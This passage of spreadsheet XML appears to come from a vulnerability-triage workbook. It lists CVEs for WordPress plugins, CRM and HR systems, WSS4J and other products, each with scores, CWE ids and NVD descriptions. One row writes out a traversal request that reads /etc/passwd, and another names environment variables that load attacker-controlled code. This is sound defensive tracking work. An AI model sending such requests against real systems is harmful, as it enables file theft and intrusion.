      <c r="P66" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q66" s="5" t="inlineStr"/>
      <c r="R66" s="5" t="inlineStr">
        <is>
          <t>CWE-89</t>
        </is>
      </c>
      <c r="S66" s="5" t="inlineStr">
        <is>
          <t>Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in WPTasty Business Directory business-directory-plugin allows Blind SQL Injection.This issue affects Business Directory: from n/a through 6.4.27.</t>
        </is>
      </c>
      <c r="T66" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-62097</t>
        </is>
      </c>
    </row>
    <row r="67">
      <c r="A67" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B67" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C67" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-96828</t>
        </is>
      </c>
      <c r="D67" s="5" t="n">
        <v>7.6</v>
      </c>
      <c r="E67" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F67" s="5" t="inlineStr">
        <is>
          <t>audit@patchstack.com</t>
        </is>
      </c>
      <c r="G67" s="5" t="inlineStr"/>
      <c r="H67" s="5" t="inlineStr"/>
      <c r="I67" s="5" t="inlineStr"/>
      <c r="J67" s="5" t="inlineStr">
        <is>
          <t>go</t>
        </is>
      </c>
      <c r="K67" s="5" t="inlineStr"/>
      <c r="L67" s="5" t="inlineStr"/>
      <c r="M67" s="5" t="inlineStr"/>
      <c r="N67" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O67" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P67" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q67" s="5" t="inlineStr"/>
      <c r="R67" s="5" t="inlineStr">
        <is>
          <t>CWE-89</t>
        </is>
      </c>
      <c r="S67" s="5" t="inlineStr">
        <is>
          <t>Administrator SQL Injection in Category Discount Woocommerce &lt;= 5.18 versions.</t>
        </is>
      </c>
      <c r="T67" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-96828</t>
        </is>
      </c>
    </row>
    <row r="68">
      <c r="A68" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B68" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C68" s="5" t="inlineStr">
        <is>
          <t>CVE-2023-54403</t>
        </is>
      </c>
      <c r="D68" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E68" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F68" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G68" s="5" t="inlineStr"/>
      <c r="H68" s="5" t="inlineStr"/>
      <c r="I68" s="5" t="inlineStr"/>
      <c r="J68" s="5" t="inlineStr">
        <is>
          <t>php, gin, hp</t>
        </is>
      </c>
      <c r="K68" s="5" t="inlineStr"/>
      <c r="L68" s="5" t="inlineStr"/>
      <c r="M68" s="5" t="inlineStr"/>
      <c r="N68" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O68" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P68" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q68" s="5" t="inlineStr"/>
      <c r="R68" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="S68" s="5" t="inlineStr">
        <is>
          <t>Yonyou U8 CRM before V16.5 and V18 contains an arbitrary file read vulnerability in /ajax/getemaildata.php that allows unauthenticated attackers to bypass authentication using the DontCheckLogin=1 parameter and read arbitrary files via an unvalidated filePath parameter. Attackers can exploit this flaw to read sensitive files outside the web application directory, including configuration files containing database or service credentials. Exploitation evidence was first observed by the Shadowserver Foundation on 2023-10-14.</t>
        </is>
      </c>
      <c r="T68" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2023-54403</t>
        </is>
      </c>
    </row>
    <row r="69">
      <c r="A69" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B69" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C69" s="5" t="inlineStr">
        <is>
          <t>CVE-2024-58387</t>
        </is>
      </c>
      <c r="D69" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E69" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F69" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G69" s="5" t="inlineStr"/>
      <c r="H69" s="5" t="inlineStr"/>
      <c r="I69" s="5" t="inlineStr"/>
      <c r="J69" s="5" t="inlineStr">
        <is>
          <t>requests</t>
        </is>
      </c>
      <c r="K69" s="5" t="inlineStr"/>
      <c r="L69" s="5" t="inlineStr"/>
      <c r="M69" s="5" t="inlineStr"/>
      <c r="N69" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O69" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P69" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q69" s="5" t="inlineStr"/>
      <c r="R69" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="S69" s="5" t="inlineStr">
        <is>
          <t>Inspur Haiyue HCM Cloud contains an arbitrary file read vulnerability in the /api/model_report/file/download endpoint that allows unauthenticated remote attackers to read arbitrary files by supplying unvalidated path parameters index and ext. Attackers can craft requests such as /api/model_report/file/download?index=/&amp;ext=&lt;path&gt; to traverse the filesystem and disclose sensitive files including /etc/passwd, application database files, and system configuration files. Exploitation evidence was first observed by the Shadowserver Foundation on 2024-11-04 .</t>
        </is>
      </c>
      <c r="T69" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2024-58387</t>
        </is>
      </c>
    </row>
    <row r="70">
      <c r="A70" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B70" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C70" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-101884</t>
        </is>
      </c>
      <c r="D70" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E70" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F70" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G70" s="5" t="inlineStr"/>
      <c r="H70" s="5" t="inlineStr"/>
      <c r="I70" s="5" t="inlineStr"/>
      <c r="J70" s="5" t="inlineStr">
        <is>
          <t>dotnet</t>
        </is>
      </c>
      <c r="K70" s="5" t="inlineStr"/>
      <c r="L70" s="5" t="inlineStr"/>
      <c r="M70" s="5" t="inlineStr"/>
      <c r="N70" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O70" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P70" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q70" s="5" t="inlineStr"/>
      <c r="R70" s="5" t="inlineStr">
        <is>
          <t>CWE-184</t>
        </is>
      </c>
      <c r="S70" s="5" t="inlineStr">
        <is>
          <t>OpenClaw Windows Node before 2026.7.1 contains an incomplete environment-variable sanitizer in system.run that fails to block GIT_CONFIG_*, DOTNET_STARTUP_HOOKS, and JAVA_TOOL_OPTIONS variables. Attackers with gateway or agent access can supply these variables to allowlisted tools like git, dotnet, or java to load attacker-controlled code and achieve arbitrary code execution.</t>
        </is>
      </c>
      <c r="T70" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-101884</t>
        </is>
      </c>
    </row>
    <row r="71">
      <c r="A71" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B71" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C71" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-102091</t>
        </is>
      </c>
      <c r="D71" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E71" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F71" s="5" t="inlineStr">
        <is>
          <t>9119a7d8-5eab-497f-8521-727c672e3725</t>
        </is>
      </c>
      <c r="G71" s="5" t="inlineStr"/>
      <c r="H71" s="5" t="inlineStr"/>
      <c r="I71" s="5" t="inlineStr"/>
      <c r="J71" s="5" t="inlineStr">
        <is>
          <t>requests</t>
        </is>
      </c>
      <c r="K71" s="5" t="inlineStr"/>
      <c r="L71" s="5" t="inlineStr"/>
      <c r="M71" s="5" t="inlineStr"/>
      <c r="N71" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O71" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P71" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q71" s="5" t="inlineStr"/>
      <c r="R71" s="5" t="inlineStr">
        <is>
          <t>CWE-918</t>
        </is>
      </c>
      <c r="S71" s="5" t="inlineStr">
        <is>
          <t>Kiteworks Secure Data Forms before version 9.5.0 is vulnerable to Server-Side Request Forgery that could allow an unauthenticated, remote attacker to make the server issue arbitrary outbound network requests and read back the responses. This could potentially be used to reach internal-only services or other network-restricted resources.</t>
        </is>
      </c>
      <c r="T71" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-102091</t>
        </is>
      </c>
    </row>
    <row r="72">
      <c r="A72" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B72" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C72" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-6806</t>
        </is>
      </c>
      <c r="D72" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E72" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F72" s="5" t="inlineStr">
        <is>
          <t>security@wordfence.com</t>
        </is>
      </c>
      <c r="G72" s="5" t="inlineStr"/>
      <c r="H72" s="5" t="inlineStr"/>
      <c r="I72" s="5" t="inlineStr"/>
      <c r="J72" s="5" t="inlineStr">
        <is>
          <t>gin</t>
        </is>
      </c>
      <c r="K72" s="5" t="inlineStr"/>
      <c r="L72" s="5" t="inlineStr"/>
      <c r="M72" s="5" t="inlineStr"/>
      <c r="N72" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O72" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P72" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q72" s="5" t="inlineStr"/>
      <c r="R72" s="5" t="inlineStr">
        <is>
          <t>CWE-89</t>
        </is>
      </c>
      <c r="S72" s="5" t="inlineStr">
        <is>
          <t>The Motors – Car Dealership &amp; Classified Listings Plugin plugin for WordPress is vulnerable to time-based blind SQL Injection via the 'stm_lat/stm_lng' parameter in all versions up to, and including, 1.4.109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T72" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-6806</t>
        </is>
      </c>
    </row>
    <row r="73">
      <c r="A73" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B73" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C73" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-75098</t>
        </is>
      </c>
      <c r="D73" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E73" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F73" s="5" t="inlineStr">
        <is>
          <t>security@wordfence.com</t>
        </is>
      </c>
      <c r="G73" s="5" t="inlineStr"/>
      <c r="H73" s="5" t="inlineStr"/>
      <c r="I73" s="5" t="inlineStr"/>
      <c r="J73" s="5" t="inlineStr">
        <is>
          <t>gin</t>
        </is>
      </c>
      <c r="K73" s="5" t="inlineStr"/>
      <c r="L73" s="5" t="inlineStr"/>
      <c r="M73" s="5" t="inlineStr"/>
      <c r="N73" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O73" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P73" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q73" s="5" t="inlineStr"/>
      <c r="R73" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="S73" s="5" t="inlineStr">
        <is>
          <t>The Product Designer App plugin for WordPress is vulnerable to Directory Traversal in all versions up to, and including, 1.1.3 via the 'svg' parameter parameter. This makes it possible for unauthenticated attackers to read the contents of arbitrary files on the server, which can contain sensitive information. The endpoint's only authentication gate relies on a nonce and token that are both publicly emitted as JavaScript globals on any page rendering the [pdapp-studio-page] shortcode, making them freely obtainable by anonymous visitors.</t>
        </is>
      </c>
      <c r="T73" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-75098</t>
        </is>
      </c>
    </row>
    <row r="74">
      <c r="A74" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B74" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C74" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89294</t>
        </is>
      </c>
      <c r="D74" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E74" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F74" s="5" t="inlineStr">
        <is>
          <t>security@wordfence.com</t>
        </is>
      </c>
      <c r="G74" s="5" t="inlineStr"/>
      <c r="H74" s="5" t="inlineStr"/>
      <c r="I74" s="5" t="inlineStr"/>
      <c r="J74" s="5" t="inlineStr">
        <is>
          <t>php, gin, hp</t>
        </is>
      </c>
      <c r="K74" s="5" t="inlineStr"/>
      <c r="L74" s="5" t="inlineStr"/>
      <c r="M74" s="5" t="inlineStr"/>
      <c r="N74" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O74" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P74" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q74" s="5" t="inlineStr"/>
      <c r="R74" s="5" t="inlineStr">
        <is>
          <t>CWE-98</t>
        </is>
      </c>
      <c r="S74" s="5" t="inlineStr">
        <is>
          <t>The Simply Schedule Appointments plugin for WordPress is vulnerable to Local File Inclusion in all versions up to, and including, 1.6.12.27 via the 'ssa_locale' parameter parameter. This makes it possible for authenticated attackers, with subscriber-level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Notably, exploitation does not require authentication in practice, as the locale filter is installed unconditionally on every request during plugins_loaded and the callback performs no nonce or capability check before returning the raw GET parameter value.</t>
        </is>
      </c>
      <c r="T74" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89294</t>
        </is>
      </c>
    </row>
    <row r="75">
      <c r="A75" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B75" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C75" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-92245</t>
        </is>
      </c>
      <c r="D75" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E75" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F75" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G75" s="5" t="inlineStr"/>
      <c r="H75" s="5" t="inlineStr"/>
      <c r="I75" s="5" t="inlineStr"/>
      <c r="J75" s="5" t="inlineStr">
        <is>
          <t>gin</t>
        </is>
      </c>
      <c r="K75" s="5" t="inlineStr"/>
      <c r="L75" s="5" t="inlineStr"/>
      <c r="M75" s="5" t="inlineStr"/>
      <c r="N75" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O75" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="P75" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q75" s="5" t="inlineStr"/>
      <c r="R75" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="S75" s="5" t="inlineStr">
        <is>
          <t>The Simply Schedule Appointments plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 1.6.12.32 via the 'recursive' parameter. This makes it possible for unauthenticated attackers to extract customer PII — including names, email addresses, phone numbers, and custom form field data — stored in appointment records, as well as per-appointment public_token values. The leaked per-appointment public_token values also enable unauthenticated attackers to delete arbitrary appointments via the DELETE /wp-json/ssa/v1/appointments/{id} endpoint, which accepts the token as sole authorization.</t>
        </is>
      </c>
      <c r="T75" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-92245</t>
        </is>
      </c>
    </row>
    <row r="76">
      <c r="A76" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B76" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C76" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-95616</t>
        </is>
      </c>
      <c r="D76" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E76" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F76" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G76" s="5" t="inlineStr"/>
      <c r="H76" s="5" t="inlineStr"/>
      <c r="I76" s="5" t="inlineStr"/>
      <c r="J76" s="5" t="inlineStr">
        <is>
          <t>requests</t>
        </is>
      </c>
      <c r="K76" s="5" t="inlineStr"/>
      <c r="L76" s="5" t="inlineStr"/>
      <c r="M76" s="5" t="inlineStr"/>
      <c r="N76" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O76" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P76" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q76" s="5" t="inlineStr"/>
      <c r="R76" s="5" t="inlineStr">
        <is>
          <t>CWE-190</t>
        </is>
      </c>
      <c r="S76" s="5" t="inlineStr">
        <is>
          <t>An integer overflow in WSS4J's DER bounds check lets an oversized allocation pass validation. An unauthenticated attacker can send a SOAP message carrying an X.509 certificate whose SubjectKeyIdentifier extension declares a length of 0x7FFFFFFF; WSS4J decodes this while resolving the signature's key reference, before the message is authenticated, so an eleven-byte extension triggers a 2 GB allocation. Repeated requests exhaust server memory.
Users are recommended to upgrade to versions 4.0.2 or 3.0.6 or 2.4.4, which fix this issue.</t>
        </is>
      </c>
      <c r="T76" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-95616</t>
        </is>
      </c>
    </row>
    <row r="77">
      <c r="A77" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B77" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C77" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-96818</t>
        </is>
      </c>
      <c r="D77" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E77" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F77" s="5" t="inlineStr">
        <is>
          <t>audit@patchstack.com</t>
        </is>
      </c>
      <c r="G77" s="5" t="inlineStr"/>
      <c r="H77" s="5" t="inlineStr"/>
      <c r="I77" s="5" t="inlineStr"/>
      <c r="J77" s="5" t="inlineStr">
        <is>
          <t>express</t>
        </is>
      </c>
      <c r="K77" s="5" t="inlineStr"/>
      <c r="L77" s="5" t="inlineStr"/>
      <c r="M77" s="5" t="inlineStr"/>
      <c r="N77" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O77" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P77" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q77" s="5" t="inlineStr"/>
      <c r="R77" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="S77" s="5" t="inlineStr">
        <is>
          <t>Unauthenticated Broken Access Control in WP Express Checkout (Accept PayPal Payments) &lt;= 2.4.9 versions.</t>
        </is>
      </c>
      <c r="T77" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-96818</t>
        </is>
      </c>
    </row>
    <row r="78">
      <c r="A78" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B78" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C78" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-103229</t>
        </is>
      </c>
      <c r="D78" s="5" t="n">
        <v>7.3</v>
      </c>
      <c r="E78" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F78" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G78" s="5" t="inlineStr"/>
      <c r="H78" s="5" t="inlineStr"/>
      <c r="I78" s="5" t="inlineStr"/>
      <c r="J78" s="5" t="inlineStr">
        <is>
          <t>mysql, php, hp</t>
        </is>
      </c>
      <c r="K78" s="5" t="inlineStr"/>
      <c r="L78" s="5" t="inlineStr"/>
      <c r="M78" s="5" t="inlineStr"/>
      <c r="N78" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O78" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P78" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q78" s="5" t="inlineStr"/>
      <c r="R78" s="5" t="inlineStr">
        <is>
          <t>CWE-74, CWE-89</t>
        </is>
      </c>
      <c r="S78" s="5" t="inlineStr">
        <is>
          <t>A vulnerability was found in AdithyaYelloju Restaurant-Management-System up to 7f0e7e84255e8fcfd488e83f8f91451bbbff6b9c. This issue affects the function mysqli_query of the file admin/delete1.php of the component Unauthenticated Action Script. Performing a manipulation of the argument ID results in sql injection. The attack can be initiated remotely. The exploit has been made public and could be used. Continious delivery with rolling releases is used by this product. Therefore, no version details of affected nor updated releases are available. The project was informed of the problem early through an issue report but has not responded yet.</t>
        </is>
      </c>
      <c r="T78" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-103229</t>
        </is>
      </c>
    </row>
    <row r="79">
      <c r="A79" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B79" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C79" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-103231</t>
        </is>
      </c>
      <c r="D79" s="5" t="n">
        <v>7.3</v>
      </c>
      <c r="E79" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F79" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G79" s="5" t="inlineStr"/>
      <c r="H79" s="5" t="inlineStr"/>
      <c r="I79" s="5" t="inlineStr"/>
      <c r="J79" s="5" t="inlineStr">
        <is>
          <t>mysql, php, hp</t>
        </is>
      </c>
      <c r="K79" s="5" t="inlineStr"/>
      <c r="L79" s="5" t="inlineStr"/>
      <c r="M79" s="5" t="inlineStr"/>
      <c r="N79" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O79" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P79" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q79" s="5" t="inlineStr"/>
      <c r="R79" s="5" t="inlineStr">
        <is>
          <t>CWE-74, CWE-89</t>
        </is>
      </c>
      <c r="S79" s="5" t="inlineStr">
        <is>
          <t>A vulnerability was identified in AdithyaYelloju Restaurant-Management-System up to 7f0e7e84255e8fcfd488e83f8f91451bbbff6b9c. The affected element is the function mysqli_query of the file User/cancel.php of the component Order Cancellation. The manipulation of the argument ID leads to sql injection. The attack may be initiated remotely. The exploit is publicly available and might be used. The project was informed of the problem early through an issue report but has not responded yet.</t>
        </is>
      </c>
      <c r="T79" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-103231</t>
        </is>
      </c>
    </row>
    <row r="80">
      <c r="A80" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B80" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C80" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-47496</t>
        </is>
      </c>
      <c r="D80" s="5" t="n">
        <v>7.3</v>
      </c>
      <c r="E80" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F80" s="5" t="inlineStr">
        <is>
          <t>psirt@nvidia.com</t>
        </is>
      </c>
      <c r="G80" s="5" t="inlineStr"/>
      <c r="H80" s="5" t="inlineStr"/>
      <c r="I80" s="5" t="inlineStr"/>
      <c r="J80" s="5" t="inlineStr">
        <is>
          <t>gin</t>
        </is>
      </c>
      <c r="K80" s="5" t="inlineStr"/>
      <c r="L80" s="5" t="inlineStr"/>
      <c r="M80" s="5" t="inlineStr"/>
      <c r="N80" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O80" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P80" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q80" s="5" t="inlineStr"/>
      <c r="R80" s="5" t="inlineStr">
        <is>
          <t>CWE-787</t>
        </is>
      </c>
      <c r="S80" s="5" t="inlineStr">
        <is>
          <t>NVIDIA GPU Display Driver for Linux contains a vulnerability in the Virtual GPU Manager (vGPU plugin) where a guest VM user may cause an out-of-bounds write by sending a specially crafted RPC call to the host. A successful exploit of this vulnerability might lead to escalation of privileges, data tampering, and denial of service.</t>
        </is>
      </c>
      <c r="T80" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-47496</t>
        </is>
      </c>
    </row>
    <row r="81">
      <c r="A81" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B81" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C81" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-76143</t>
        </is>
      </c>
      <c r="D81" s="5" t="n">
        <v>7.3</v>
      </c>
      <c r="E81" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F81" s="5" t="inlineStr">
        <is>
          <t>vuln@krcert.or.kr</t>
        </is>
      </c>
      <c r="G81" s="5" t="inlineStr"/>
      <c r="H81" s="5" t="inlineStr"/>
      <c r="I81" s="5" t="inlineStr"/>
      <c r="J81" s="5" t="inlineStr">
        <is>
          <t>gin</t>
        </is>
      </c>
      <c r="K81" s="5" t="inlineStr"/>
      <c r="L81" s="5" t="inlineStr"/>
      <c r="M81" s="5" t="inlineStr"/>
      <c r="N81" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O81" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="P81" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q81" s="5" t="inlineStr"/>
      <c r="R81" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="S81" s="5" t="inlineStr">
        <is>
          <t>A missing authorization vulnerability in Genian SSL PNS allows an attacker to bypass multi-factor authentication by manipulating a login request parameter.</t>
        </is>
      </c>
      <c r="T81" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-76143</t>
        </is>
      </c>
    </row>
    <row r="82">
      <c r="A82" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B82" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C82" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-102142</t>
        </is>
      </c>
      <c r="D82" s="5" t="n">
        <v>7.2</v>
      </c>
      <c r="E82" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F82" s="5" t="inlineStr">
        <is>
